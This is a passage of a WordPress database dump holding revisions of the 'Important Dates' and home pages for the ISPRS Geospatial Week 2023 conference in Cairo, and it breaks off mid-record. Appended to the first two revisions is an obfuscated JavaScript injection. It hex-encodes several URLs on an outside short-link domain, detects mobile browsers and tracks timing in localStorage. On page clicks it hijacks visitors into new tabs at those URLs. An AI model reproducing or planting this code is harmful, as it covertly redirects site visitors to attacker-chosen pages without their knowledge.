(3538,1,'2023-01-07 14:56:50','2023-01-07 14:56:50','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></h5>\n<h5></h5>\n<h5 style=\"text-align: justify; color: red;\"><strong>Paper submissions</strong></h5>\n<ul class=\"nospace\">\n<li>\n<h6><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Full paper Author notification: May 2023</strong></h6>\n</li>\n<li>\n<h6><strong>Camera ready paper submission: July 2023</strong></h6>\n</li>\n</ul>\n<h5></h5>\n<h5 style=\"text-align: justify; color: red;\"><strong>Registration deadlines</strong></h5>\n<ul>\n<li>\n<h6><strong>Early bird registration deadline: May 1, 2023</strong></h6>\n</li>\n<li>\n<h6><strong>Late registration deadline: July 1, 2023</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-01-07 14:56:50','2023-01-07 14:56:50','',2654,'https://gsw2023.com/?p=3538',0,'revision','',0),
(3539,1,'2023-01-09 15:03:23','2023-01-09 15:03:23','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span><u></u><u></u></b></h1>\n<h4><b>Paper submissions<u></u><u></u></b></h4>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpFirst\"><u></u>•  <u></u>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)<u></u><u></u></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpMiddle\"><u></u>•  Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)<u></u><u></u></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpMiddle\"><u></u>•  <u></u>Abstracts Author notification: May 15, 2023<u></u><u></u></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpMiddle\"><u></u>•  <u></u>Full paper Author notification: May 1, 2023<u></u><u></u></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpLast\"><u></u>•  Camera ready paper submission: June 1, 2023<u></u><u></u></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h4><b>Registration deadlines<u></u><u></u></b></h4>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpFirst\"><u></u>• Early bird registration deadline: May 1, 2023<u></u><u></u></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpLast\"><u></u>• Late registration deadline: July 1, 2023</p>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-01-09 15:03:23','2023-01-09 15:03:23','',2654,'https://gsw2023.com/?p=3539',0,'revision','',0),
(3540,1,'2023-01-09 19:22:57','2023-01-09 19:22:57','<p>[vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column 